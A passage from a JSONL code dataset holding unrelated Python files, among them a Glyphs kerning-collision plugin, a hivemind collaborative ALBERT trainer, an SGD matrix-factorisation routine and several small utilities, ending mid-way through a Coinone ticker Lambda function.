NSMaxX(bounds)\n maxX = NSMaxY(bounds)\n for point in segment:\n if NSPointInRect(point, bounds):\n return True\n found = minX <= point[0] <= maxX\n if found:\n return True\n return False\n \nclass Touche(object):\n \"\"\"Checks a font for touching glyphs.\n \n font = CurrentFont()\n a, b = font['a'], font['b']\n touche = Touche(font)\n touche.checkPair(a, b)\n touche.findTouchingPairs([a, b])\n \n Public methods: checkPair, findTouchingPairs\n \"\"\"\n\n def __init__(self, font, masterID):\n self.font = font\n self.penCache = {}\n self._masterID = masterID\n #self.flatKerning = font.naked().flatKerning\n\n def findTouchingPairs(self, glyphs):\n \"\"\"Finds all touching pairs in a list of glyphs.\n\n Returns a list of tuples containing the names of overlapping glyphs\n \"\"\"\n \n # lookup all sidebearings\n lsb, rsb = ({} for i in range(2))\n for g in glyphs:\n lsb[g], rsb[g] = g.LSB, g.RSB\n self.lsb, self.rsb = lsb, rsb\n \n pairs = [(g1, g2) for g1 in glyphs for g2 in glyphs]\n return [(g1.parent.name, g2.parent.name) for (g1, g2) in pairs if self.checkPair(g1, g2)]\n\n # def getKerning(self, g1, g2):\n # return self.flatKerning.get((g1.name, g2.name), 0)\n\n def checkPair(self, g1, g2):\n \"\"\"New checking method contributed by Frederik\n\n Returns a Boolean if overlapping.\n \"\"\"\n if Glyphs.versionNumber >= 3:\n kern = g1.nextKerningForLayer_direction_(g2, LTR)\n else:\n kern = g1.rightKerningForLayer_(g2)\n if kern > 10000:\n kern = 0\n # Check sidebearings first (PvB's idea)\n if self.rsb[g1] + self.lsb[g2] + kern > 0:\n return False\n\n # get the bounds and check them\n bounds1 = g1.bounds\n bounds2 = g2.bounds \n\n bounds2 = NSOffsetRect(bounds2, g1.width + kern, 0)\n # check for intersection bounds\n intersectingBounds = NSIntersectsRect(bounds1, bounds2)\n if not intersectingBounds:\n return False\n\n # create a pen for g1 with a shifted rect, draw the glyph into the pen\n pen1 = self.penCache.get(g1.name, None)\n if not pen1:\n pen1 = SegmentsPen.SegmentsPen(self.font, self._masterID)\n g1.draw(pen1)\n self.penCache[g1.name] = pen1\n \n # create a pen for g2 with a shifted rect and move each found segment with the width and kerning\n \n pen2 = self.penCache.get(g2.name, None)\n if not pen2:\n pen2 = SegmentsPen.SegmentsPen(self.font, self._masterID)\n g2.draw(pen2)\n self.penCache[g2.name] = pen2\n \n offset = g1.width+kern\n \n for segment1 in pen1.segments:\n if not NSIntersectsRect(segment1, bounds2):\n continue\n \n for segment2 in pen2.segments:\n segment2 = [(p[0] + offset, p[1]) for p in segment2]\n if not segmentInBound(segment2, bounds1):\n continue\n if len(segment1) == 4 and len(segment2) == 4:\n a1, a2, a3, a4 = segment1\n b1, b2, b3, b4 = segment2\n result = GSIntersectBezier3Bezier3(a1, a2, a3, a4, b1, b2, b3, b4)\n elif len(segment1) == 4:\n p1, p2, p3, p4 = segment1\n a1, a2 = segment2\n result = GSIntersectBezier3Line(p1, p2, p3, p4, a1, a2)\n elif len(segment2) == 4:\n p1, p2, p3, p4 = segment2\n a1, a2 = segment1\n result = GSIntersectBezier3Line(p1, p2, p3, p4, a1, a2)\n else:\n a1, a2 = segment1\n b1, b2 = segment2\n result = GSIntersectLineLine(a1, a2, b1, b2)\n result = result.x < 100000\n if result:\n return True\n return False\n","sub_path":"Touche.glyphsPlugin/Contents/Resources/Touche.py","file_name":"Touche.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442350247","text":"import random\nimport sys\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtWidgets import QWidget, QApplication\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n\n self.setGeometry(1200, 400, 500, 300)\n self.setWindowTitle('DrawPoints')\n self.show()\n self.updateXY(100,100)\n\n def updateXY(self,recv_x,recv_y):\n global x\n x=recv_x\n global y\n y=recv_y\n\n def paintEvent(self, e):\n qp = QPainter()\n qp.begin(self)\n self.drawPoints(qp,x,y)\n qp.end()\n\n def drawPoints(self, qp,x,y):\n qp.setPen(Qt.darkBlue)\n size = self.size()\n for i in range(1000): # 绘制1000次\n x = random.randint(1, size.width() - 1)\n y = random.randint(1, size.height() - 1)\n qp.drawPoint(x, y)\n\n # qp.drawPoint(x,y)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n","sub_path":"paint/PaintPoint.py","file_name":"PaintPoint.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"550937406","text":"#!/usr/bin/env python\n\nimport os\nimport pickle\nfrom dataclasses import asdict\nfrom pathlib import Path\n\nimport torch\nimport transformers\nfrom datasets import load_from_disk\nfrom torch.utils.data import DataLoader\nfrom torch_optimizer import Lamb\nfrom transformers import DataCollatorForLanguageModeling, HfArgumentParser, TrainingArguments, set_seed\nfrom transformers.models.albert import AlbertConfig, AlbertForPreTraining, AlbertTokenizerFast\nfrom transformers.optimization import get_linear_schedule_with_warmup\nfrom transformers.trainer import Trainer\nfrom transformers.trainer_utils import is_main_process\n\nimport hivemind\nfrom hivemind.utils.logging import get_logger, use_hivemind_log_handler\n\nimport utils\nfrom arguments import AlbertTrainingArguments, AveragerArguments, CollaborationArguments, DatasetArguments\n\nuse_hivemind_log_handler(\"in_root_logger\")\nlogger = get_logger(__name__)\n\nLRSchedulerBase = getattr(torch.optim.lr_scheduler, \"_LRScheduler\", None)\n\n\ndef setup_transformers_logging(process_rank: int):\n if is_main_process(process_rank):\n transformers.utils.logging.set_verbosity_info()\n transformers.utils.logging.disable_default_handler()\n transformers.utils.logging.enable_propagation()\n\n\ndef get_model(training_args, config, tokenizer):\n # Find latest checkpoint in output_dir\n output_dir = Path(training_args.output_dir)\n logger.info(f'Checkpoint dir {output_dir}, contents {list(output_dir.glob(\"checkpoint*\"))}')\n latest_checkpoint_dir = max(output_dir.glob(\"checkpoint*\"), default=None, key=os.path.getctime)\n\n if latest_checkpoint_dir is not None:\n logger.info(f\"Loading model from {latest_checkpoint_dir}\")\n model = AlbertForPreTraining.from_pretrained(latest_checkpoint_dir)\n else:\n logger.info(f\"Training from scratch\")\n model = AlbertForPreTraining(config)\n model.resize_token_embeddings(len(tokenizer))\n\n return model\n\n\ndef get_optimizer_and_scheduler(training_args, model):\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": training_args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n\n opt = Lamb(\n optimizer_grouped_parameters,\n lr=training_args.learning_rate,\n betas=(training_args.adam_beta1, training_args.adam_beta2),\n eps=training_args.adam_epsilon,\n weight_decay=training_args.weight_decay,\n clamp_value=training_args.clamp_value,\n debias=True,\n )\n\n scheduler = get_linear_schedule_with_warmup(\n opt, num_warmup_steps=training_args.warmup_steps, num_training_steps=training_args.max_steps\n )\n\n return opt, scheduler\n\n\nclass CollaborativeCallback(transformers.TrainerCallback):\n \"\"\"\n This callback monitors and reports collaborative training progress.\n In case of a catastrophic failure, it can also revert training to a backup.\n \"\"\"\n\n def __init__(\n self,\n dht: hivemind.DHT,\n optimizer: hivemind.CollaborativeOptimizer,\n model: torch.nn.Module,\n local_public_key: bytes,\n statistics_expiration: float,\n backup_every_steps: int,\n ):\n super().__init__()\n self.model = model\n self.dht, self.collaborative_optimizer = dht, optimizer\n self.local_public_key = local_public_key\n self.statistics_expiration = statistics_expiration\n self.last_reported_collaboration_step = -1\n self.samples = 0\n self.steps = 0\n self.loss = 0\n self.total_samples_processed = 0\n self.backup_every_steps = backup_every_steps\n self.latest_backup = self.backup_state()\n\n def on_train_begin(\n self, args: TrainingArguments, state: transformers.TrainerState, control: transformers.TrainerControl, **kwargs\n ):\n logger.info(\"Loading state from peers\")\n self.collaborative_optimizer.load_state_from_peers()\n\n def on_step_end(\n self, args: TrainingArguments, state: transformers.TrainerState, control: transformers.TrainerControl, **kwargs\n ):\n control.should_log = True\n if not self.params_are_finite():\n self.restore_from_backup(self.latest_backup)\n return control\n\n if state.log_history:\n self.loss += state.log_history[-1][\"loss\"]\n self.steps += 1\n if self.collaborative_optimizer.local_step != self.last_reported_collaboration_step:\n self.last_reported_collaboration_step = self.collaborative_optimizer.local_step\n self.total_samples_processed += self.samples\n samples_per_second = self.collaborative_optimizer.performance_ema.samples_per_second\n statistics = utils.LocalMetrics(\n step=self.collaborative_optimizer.local_step,\n samples_per_second=samples_per_second,\n samples_accumulated=self.samples,\n loss=self.loss,\n mini_steps=self.steps,\n )\n logger.info(f\"Step #{self.collaborative_optimizer.local_step}\")\n logger.info(f\"Your current contribution: {self.total_samples_processed} samples\")\n logger.info(f\"Performance: {samples_per_second} samples per second.\")\n if self.steps:\n logger.info(f\"Local loss: {self.loss / self.steps}\")\n if self.collaborative_optimizer.local_step % self.backup_every_steps == 0:\n self.latest_backup = self.backup_state()\n\n self.loss = 0\n self.steps = 0\n if self.collaborative_optimizer.is_synchronized:\n self.dht.store(\n key=self.collaborative_optimizer.prefix + \"_metrics\",\n subkey=self.local_public_key,\n value=statistics.dict(),\n expiration_time=hivemind.get_dht_time() + self.statistics_expiration,\n return_future=True,\n )\n\n self.samples = self.collaborative_optimizer.local_samples_accumulated\n\n return control\n\n @torch.no_grad()\n def params_are_finite(self):\n for param in self.model.parameters():\n if not torch.all(torch.isfinite(param)):\n return False\n return True\n\n @torch.no_grad()\n def backup_state(self) -> bytes:\n return pickle.dumps(\n {\"model\": self.model.state_dict(), \"optimizer\": self.collaborative_optimizer.opt.state_dict()}\n )\n\n @torch.no_grad()\n def restore_from_backup(self, backup: bytes):\n state = pickle.loads(backup)\n self.model.load_state_dict(state[\"model\"])\n self.collaborative_optimizer.opt.load_state_dict(state[\"optimizer\"])\n\n\nclass NoOpScheduler(LRSchedulerBase):\n \"\"\"Dummy scheduler for transformers.Trainer. The real scheduler is defined in CollaborativeOptimizer.scheduler\"\"\"\n\n def get_lr(self):\n return [group[\"lr\"] for group in self.optimizer.param_groups]\n\n def print_lr(self, *args, **kwargs):\n if self.optimizer.scheduler:\n return self.optimizer.scheduler.print_lr(*args, **kwargs)\n\n def step(self):\n self._last_lr = self.get_lr()\n\n def state_dict(self):\n return {}\n\n def load_state_dict(self, *args, **kwargs):\n logger.debug(\"Called NoOpScheduler.load_state_dict\")\n\n\ndef main():\n parser = HfArgumentParser((AlbertTrainingArguments, DatasetArguments, CollaborationArguments, AveragerArguments))\n training_args, dataset_args, collaboration_args, averager_args = parser.parse_args_into_dataclasses()\n\n logger.info(f\"Found {len(collaboration_args.initial_peers)} initial peers: {collaboration_args.initial_peers}\")\n if len(collaboration_args.initial_peers) == 0:\n raise ValueError(\"Please specify at least one network endpoint in initial peers.\")\n\n setup_transformers_logging(training_args.local_rank)\n logger.info(f\"Training/evaluation parameters:\\n{training_args}\")\n\n # Set seed before initializing model.\n set_seed(training_args.seed)\n\n config = AlbertConfig.from_pretrained(dataset_args.config_path, cache_dir=dataset_args.cache_dir)\n tokenizer = AlbertTokenizerFast.from_pretrained(dataset_args.tokenizer_path, cache_dir=dataset_args.cache_dir)\n model = get_model(training_args, config, tokenizer)\n model.to(training_args.device)\n\n tokenized_datasets = load_from_disk(Path(dataset_args.dataset_path))\n # This data collator will take care of randomly masking the tokens.\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer)\n\n opt, scheduler = get_optimizer_and_scheduler(training_args, model)\n\n validators, local_public_key = utils.make_validators(collaboration_args.experiment_prefix)\n\n dht = hivemind.DHT(\n start=True,\n initial_peers=collaboration_args.initial_peers,\n client_mode=collaboration_args.client_mode,\n record_validators=validators,\n use_ipfs=collaboration_args.use_ipfs,\n host_maddrs=collaboration_args.host_maddrs,\n announce_maddrs=collaboration_args.announce_maddrs,\n identity_path=collaboration_args.identity_path,\n )\n utils.log_visible_maddrs(dht.get_visible_maddrs(), only_p2p=collaboration_args.use_ipfs)\n\n total_batch_size_per_step = training_args.per_device_train_batch_size * training_args.gradient_accumulation_steps\n if torch.cuda.device_count() != 0:\n total_batch_size_per_step *= torch.cuda.device_count()\n\n adjusted_target_batch_size = collaboration_args.target_batch_size - collaboration_args.batch_size_lead\n\n collaborative_optimizer = hivemind.CollaborativeOptimizer(\n opt=opt,\n dht=dht,\n scheduler=scheduler,\n prefix=collaboration_args.experiment_prefix,\n compression=hivemind.Float16Compression(),\n batch_size_per_step=total_batch_size_per_step,\n bandwidth=collaboration_args.bandwidth,\n target_batch_size=adjusted_target_batch_size,\n client_mode=collaboration_args.client_mode,\n verbose=True,\n start=True,\n **asdict(averager_args),\n )\n\n class TrainerWithIndependentShuffling(Trainer):\n def get_train_dataloader(self) -> DataLoader:\n \"\"\"Shuffle data independently for each peer to avoid duplicating batches [important for quality]\"\"\"\n torch.manual_seed(hash(local_public_key))\n return super().get_train_dataloader()\n\n trainer = TrainerWithIndependentShuffling(\n model=model,\n args=training_args,\n tokenizer=tokenizer,\n data_collator=data_collator,\n train_dataset=tokenized_datasets[\"train\"] if training_args.do_train else None,\n eval_dataset=tokenized_datasets[\"validation\"] if training_args.do_eval else None,\n optimizers=(collaborative_optimizer, NoOpScheduler(collaborative_optimizer)),\n callbacks=[\n CollaborativeCallback(\n dht,\n collaborative_optimizer,\n model,\n local_public_key,\n collaboration_args.statistics_expiration,\n collaboration_args.backup_every_steps,\n )\n ],\n )\n trainer.remove_callback(transformers.trainer_callback.PrinterCallback)\n trainer.remove_callback(transformers.trainer_callback.ProgressCallback)\n\n # Training\n if training_args.do_train:\n latest_checkpoint_dir = max(\n Path(training_args.output_dir).glob(\"checkpoint*\"), default=None, key=os.path.getctime\n )\n\n trainer.train(model_path=latest_checkpoint_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"examples/albert/run_trainer.py","file_name":"run_trainer.py","file_ext":"py","file_size_in_byte":11900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444445778","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-i686/egg/pylocator/decimate_filter.py\n# Compiled at: 2012-04-18 08:46:43\nfrom __future__ import division\nimport sys, os, vtk, gtk\nfrom gtkutils import ProgressBarDialog, str2posnum_or_err\n\nclass DecimateFilter(vtk.vtkDecimatePro):\n \"\"\"\n CLASS: DecimateFilter\n DESCR:\n \n Public attrs:\n targetReduction\n #aspectRatio \n #initialError \n #errorIncrement \n #maxIterations \n #initialAngle \n \"\"\"\n fmts = {'targetReduction': '%1.2f'}\n labels = {'targetReduction': 'Target reduction'}\n converters = {'targetReduction': str2posnum_or_err}\n targetReduction = 0.8\n\n def __init__(self):\n prog = ProgressBarDialog(title='Rendering surface', parent=None, msg='Decimating data....', size=(300,\n 40))\n prog.set_modal(True)\n\n def start(o, event):\n prog.show()\n while gtk.events_pending():\n gtk.main_iteration()\n\n def progress(o, event):\n val = o.GetProgress()\n prog.bar.set_fraction(val)\n while gtk.events_pending():\n gtk.main_iteration()\n\n def end(o, event):\n prog.hide()\n while gtk.events_pending():\n gtk.main_iteration()\n\n self.AddObserver('StartEvent', start)\n self.AddObserver('ProgressEvent', progress)\n self.AddObserver('EndEvent', end)\n return\n\n def update(self):\n self.SetTargetReduction(self.targetReduction)","sub_path":"pycfiles/pyloci-0.1.1.24-py3-none-any/decimate_filter.py","file_name":"decimate_filter.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"355342465","text":"dx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\ntunnel = [[], [0,1,2,3], [0,2], [1,3], [0,1],[1,2],[2,3],[3,0]]\ntunnel_possible = [[1,2,5,6], [1,3,6,7], [1,2,4,7],[1,3,4,5]]\n\n\nT = int(input())\nfor test_case in range(1, T+1):\n N, M, R, C, L = map(int, input().split())\n tunnels = []\n for i in range(N):\n tunnels.append(list(map(int, input().split())))\n\n\n queue = [(R,C, 1)]\n visited = [(R,C)]\n while queue:\n x,y, t = queue.pop(0)\n if t == L:\n continue\n tun = tunnel[tunnels[x][y]]\n for i in tun:\n new_x = x + dx[i]\n new_y = y + dy[i]\n if new_x < 0 or new_x >= N or new_y < 0 or new_y >= M:\n continue\n\n if tunnels[new_x][new_y] not in tunnel_possible[i]:\n continue\n if (new_x,new_y) in visited:\n continue\n visited.append((new_x,new_y))\n queue.append((new_x, new_y, t+1))\n\n\n print(\"#{} {}\".format(test_case, len(visited)))","sub_path":"SW Expert Academy/탈주범 검거.py","file_name":"탈주범 검거.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269234056","text":"#-*- coding: utf-8 -*-\nimport pygame\n\nclass Platform(pygame.sprite.Sprite):\n\t\"\"\"\n\t\tHérite de la classe Sprite de pygame,\n\t\tContient les images et les position d'une plateforme.\n\t\tL'attribut ID permet de les identifier un par un. (Aucune utilité pour le moment)\n\t\"\"\"\n\tID = 0\n\tdef __init__(self, image, pos):\n\t\tsuper().__init__()\n\t\tself.image = image\n\t\tself.rect = image.get_rect()\n\t\tself.rect.x, self.rect.y = pos\n\t\tPlatform.ID += 1\n\t\tself.id = Platform.ID\n","sub_path":"data/Platform.py","file_name":"Platform.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"353309972","text":"# coding: utf-8\nimport logging\nimport tempfile\nimport pandas as pd\n\nlog = logging.getLogger(__name__)\n\n\nclass RunMixin(object):\n def run_strat(self, strategy, return_df=True):\n \"\"\"run provided strategy, returns dataframe with all steps\"\"\"\n observation = self.reset()\n done = False\n while not done:\n action = strategy(observation, self) # call strategy\n observation, reward, done, info = self.step(action)\n\n return self.sim.to_df() if return_df else None\n\n def run_strats(self, strategy, episodes=1, write_log=True, return_df=True):\n \"\"\" run provided strategy the specified # of times, possibly\n writing a log and possibly returning a dataframe summarizing activity.\n\n Note that writing the log is expensive and returning the df is moreso.\n For training purposes, you might not want to set both.\n \"\"\"\n logfile = None\n if write_log:\n logfile = tempfile.NamedTemporaryFile(delete=False)\n log.info('writing log to %s', logfile.name)\n need_df = write_log or return_df\n\n alldf = None\n\n for i in range(episodes):\n df = self.run_strat(strategy, return_df=need_df)\n if write_log:\n df.to_csv(logfile, mode='a')\n if return_df:\n alldf = df if alldf is None else pd.concat([alldf, df], axis=0)\n\n return alldf\n","sub_path":"gym_trading/envs/mixin.py","file_name":"mixin.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"570744506","text":"from __future__ import print_function, division, absolute_import, with_statement, unicode_literals, generators\nimport os\n#from matplotlib import pyplot as plt\n#plt.switch_backend('agg')\n\nclass LossLogger(object):\n def __init__(self, names, path):\n self.names = names\n if os.path.exists(path):\n with open(path, 'r') as f:\n names_ = tuple(f.readline().strip().split())\n assert self.names == names_, \"given names: {} prev names: {}\".format(\"\\t\".join(self.names), \"\\t\".join(names_))\n self.a = [list(map(float, line.strip().split())) for line in f]\n else:\n with open(path, 'w') as f:\n print('\\t'.join(names), file=f)\n self.a = []\n self.f = open(path, 'a', 1)\n def append(self, e):\n self.a.append(e)\n print('\\t'.join(map(lambda x: \"{:.6f}\".format(x), e)), file=self.f)\n def recent(self, k):\n k = min(k, len(self.a))\n return list(map(np.mean, zip(*self.a[-k:])))\n def recent_repr(self, k):\n v = self.recent(k)\n return \"\\t\".join(\"{}: {:.3f}\".format(name, val) for name, val in zip(self.names, v))\n def plot(self, figure_name):\n plt.figure(figsize=(14, 10))\n shapes = ['x', '^', 'v', '--']\n sizes = [6, 2, 2, 2]\n for name, a, shape, size in zip(self.names, zip(*self.a), shapes, sizes):\n plt.plot(a, shape, linewidth=size, label=name)\n plt.ylabel('loss')\n plt.xlabel('training steps')\n plt.legend(loc=2., borderaxespad=0.)\n plt.savefig('{}.png'.format(figure_name))\n plt.close()\n\n","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"203324931","text":"from home.languages.english_messages import ENGLISH_MESSAGES\nfrom home.languages.french_messages import FRENCH_MESSAGES\n\n\nCODES = [\n 'success',\n 'danger'\n]\n\nACTIONS = [\n 'new',\n 'edit',\n 'delete',\n 'notify',\n 'mark_complete',\n 'verify',\n 'get',\n 'clear',\n\n # USER ACTIONS\n 'reset_password',\n 'upload_photo',\n\n # HOSTING\n 'start',\n 'stop',\n 'terminate',\n 'remove_access_key',\n 'request_access_key',\n\n # BILL ACTIONS\n 'mark_received',\n 'report',\n 'remove_report',\n\n # CONSULT REQUEST ACTIONS\n 'mark_meeting',\n\n # MESSAGE ACTIONS\n 'mark_read', 'mark_replied', 'mark_phone', 'mark_spam', 'mark_website', 'mark_app', 'mark_mobile',\n 'mark_other', 'mark_hosting', 'mark_consult',\n 'change_client'\n]\n\nOBJECTS = [\n 'user',\n 'profile',\n 'client',\n 'message',\n 'project',\n 'consult',\n 'hosting',\n 'consult_request',\n 'required_action',\n 'bill',\n 'event',\n 'timeline_section',\n 'timeline_item',\n 'file',\n 'chat_message'\n]\n\n\ndef get_status_message(info, lang):\n return {\n 'message': get_message(info, lang),\n 'code': get_message_code(info['code']),\n }\n\n\ndef get_message_info(request):\n rc = request.GET.get('code', -1)\n code = get_int(rc)\n obj = request.GET.get('object', '')\n action = request.GET.get('action', '')\n return {\n 'code': code,\n 'obj': obj if obj in OBJECTS else '',\n 'action': action if action in ACTIONS else ''\n }\n\n\ndef get_message_code(code):\n try:\n return CODES[code]\n except IndexError:\n return ''\n\n\ndef get_message(info, lang):\n if (info['code'] >= 0) and info['obj'] and info['action']:\n if lang == 'fr':\n try:\n return FRENCH_MESSAGES[info['obj']][info['action']][info['code']]\n except (KeyError, IndexError):\n return ''\n else:\n try:\n return ENGLISH_MESSAGES[info['obj']][info['action']][info['code']]\n except (KeyError, IndexError):\n return ''\n return ''\n\n\ndef get_int(num):\n try:\n return int(num)\n except ValueError:\n return -1\n","sub_path":"home/languages/util_status_messages.py","file_name":"util_status_messages.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301701615","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n\nif __name__ == \"__main__\":\n from optparse import OptionParser\n usage = \"usage: %prog -d base_folder_path\"\n parser = OptionParser(usage=usage)\n\n parser.add_option(\"-d\", \"--base-folder\",\n action=\"store\", type=\"string\", dest=\"base_folder\",\n help=\"provide a base folder which will have this structure: ./01, ./01/*.csv, ./02, ./02/*.csv, ...\")\n (options, args) = parser.parse_args()\n\n if options.base_folder is None:\n parser.error(\"no base_folder\")\n\n fig = plt.figure()\n pos_ax = fig.add_subplot(121, projection='3d')\n ori_ax = fig.add_subplot(122, projection='3d')\n\n files = os.listdir(options.base_folder)\n for f in files:\n path = os.path.join(options.base_folder, f)\n if not os.path.isdir(path):\n continue\n legend_name = f\n df = pd.read_csv(os.path.join(path, f+'-tag_multimodal.csv'),sep=',')\n \n df = df[[\n u'time', \n u'.endpoint_state.pose.position.x',\n u'.endpoint_state.pose.position.y',\n u'.endpoint_state.pose.position.z',\n u'.endpoint_state.pose.orientation.x',\n u'.endpoint_state.pose.orientation.y',\n u'.endpoint_state.pose.orientation.z',\n u'.endpoint_state.pose.orientation.w',\n u'.tag']]\n\n df = df.loc[df['.tag'] != 0]\n df['time']= pd.to_datetime(df['time'], coerce=True)\n start_time = df.head(1)['time']\n df['time']= df['time']-start_time\n\n pos_ax.plot(\n df['.endpoint_state.pose.position.x'].tolist(), \n df['.endpoint_state.pose.position.y'].tolist(), \n df['.endpoint_state.pose.position.z'].tolist(), \n label=f)\n pos_ax.legend()\n pos_ax.set_title(\"pos xyz\")\n\n ori_ax.plot(\n df['.endpoint_state.pose.orientation.x'].tolist(), \n df['.endpoint_state.pose.orientation.y'].tolist(), \n df['.endpoint_state.pose.orientation.z'].tolist(), \n label=f)\n ori_ax.legend()\n ori_ax.set_title(\"ori xyz\")\n plt.show()\n\n","sub_path":"REAL_BAXTER_PICK_N_PLACE_20170704_with_broken_wrench/success/visualize_raw_data.py","file_name":"visualize_raw_data.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"31993929","text":"import numpy as np\nfrom scipy import sparse as sps\nimport time\n\n# Throw exceptions for all numerical errors (i.e. overflow/underflow)\nnp.seterr(all=\"raise\")\n\n# SGD with Monetum. Single pass/epoch\n# Parameters:\n## data: Actual ratings\n## W: item matrix\n## V_veloc: velocity/momentum for user matrix\n## W_veloc: velocity/momentum for item matrix\n## mu: global bias (empirical mean)\n## b_v: user bias\n## b_w: item bias\n## bv_veloc: velocity/momentum for user bias\n## bw_veloc: velocity/momentum for item bias\n## eta: learning rate\n## gamma: momentum rate\n## l2_reg: L2 regularizer (lambda)\n#\n# Returns:\n# V, W, V_veloc, W_veloc, b_v, b_w, bv_veloc, bw_veloc\n\ndef sgd_momentum(data, locs, V, W, V_veloc, W_veloc, mu, b_v, b_w, bv_veloc, bw_veloc, eta = 0.01, gamma=0.5, l2_reg = 0.5):\n \n inds = np.random.permutation(len(data.data))\n \n for ind in inds:\n i,j = locs[ind]\n r = data.data[ind]\n \n error = (r - (mu + b_v[i] + b_w[j] + V[i].dot(W[j].T)))\n \n V_veloc[i] = gamma * V_veloc[i] - eta * (error * W[j] - l2_reg * V[i])\n W_veloc[j] = gamma * W_veloc[j] - eta * (error * V[i] - l2_reg * W[j])\n bv_veloc[i] = gamma * bv_veloc[i] - eta * (error - l2_reg * b_v[i])\n bw_veloc[j] = gamma * bw_veloc[j] - eta * (error - l2_reg * b_w[j])\n \n W[j] -= W_veloc[j]\n V[i] -= V_veloc[i]\n b_v[i] -= bv_veloc[i]\n b_w[j] -= bw_veloc[j]\n \n return V, W, V_veloc, W_veloc, b_v, b_w, bv_veloc, bw_veloc\n\ndef obj_func(data, locs, V, W, mu, b_v, b_w, l2_reg):\n obj = 0.\n inds = np.arange(len(data.data))\n inds = inds[0:1000000]\n for ind in inds:\n i, j = locs[ind]\n r = data.data[ind]\n obj += (r - (mu + b_v[i] + b_w[j] + V[i].dot(W[j].T)))**2\n print (\"Training RMSE (100k samples): {}\".format((obj/len(inds))**0.5))\n return obj + l2_reg * (np.square(V).sum() + np.square(W).sum() + np.square(b_v).sum() + np.square(b_w).sum())\n\n# Gradient descent function. \n# Parameters:\n## V: user matrix\n## W: item matrix\n## V_veloc: velocity/momentum for user matrix\n## W_veloc: velocity/momentum for item matrix\n## mu: global bias (empirical mean)\n## b_v: user bias\n## b_w: item bias\n## bv_veloc: velocity/momentum for user bias\n## bw_veloc: velocity/momentum for item bias\n## start_eta: Initial learning rate for SGD\n## gamma: Initial momentum rate \n## l2_reg: L2 regularizer (lambda)\n#\n# Returns:\n# V, W, b_v, b_w, number of epochs trained for, error status\n\ndef gradient_descent(data, \n V, W, \n V_veloc, W_veloc, \n mu, b_v, b_w, \n bv_veloc, bw_veloc, \n start_eta, gamma, l2_reg):\n \n last_obj = 1e20\n eta = start_eta\n locs = np.array(list(zip(data.row, data.col)))\n epoch_cnt = 1\n \n while True:\n print (\"Starting epoch {} ...\".format(epoch_cnt))\n start = time.time()\n try:\n V, W, V_veloc, W_veloc, b_v, b_w, bv_veloc, bw_veloc = sgd_momentum(data, locs, \n V, W, V_veloc, W_veloc, \n mu, b_v, b_w, bv_veloc, bw_veloc, \n eta, gamma, l2_reg)\n except FloatingPointError as e:\n print (\"Floating point error encountered: {}, aborting SGD.\".format(e))\n return V, W, b_v, b_w, epoch_cnt, True\n \n end = time.time()\n print (\"Finished epoch {} (Time: {} s)\".format(epoch_cnt, round(end-start, 0)))\n \n obj = obj_func(data, locs, V, W, mu, b_v, b_w, l2_reg)\n print (\"Cost: {}\".format(obj))\n if obj > last_obj:\n print (\"Adjusting eta....\")\n eta *= 0.1\n elif (last_obj-obj)/last_obj <= 0.001:\n return V, W, b_v, b_w, epoch_cnt, False\n else:\n pass\n \n if eta < 1.0e-4:\n return V, W, b_v, b_w, epoch_cnt, False\n \n last_obj = obj\n gamma *= 1.1\n epoch_cnt += 1\n \n print (\"-------------\")","sub_path":"hw1/sgd.py","file_name":"sgd.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92743902","text":"import boto3\nfrom botocore.vendored import requests\nfrom datetime import datetime, timezone\nfrom dateutil import tz\nfrom decimal import *\nimport logging\n\nAPI_TICKER = \"https://api.coinone.co.kr/ticker?currency=all\"\nCOINS = [\"btc\", \"eth\", \"etc\", \"xrp\"]\n\n\ndef get_datetime_kst_now():\n return datetime.now(timezone.utc).astimezone(tz.gettz(\"Asia/Seoul\"))\n\n\ndef lambda_handler(event, context):\n logger 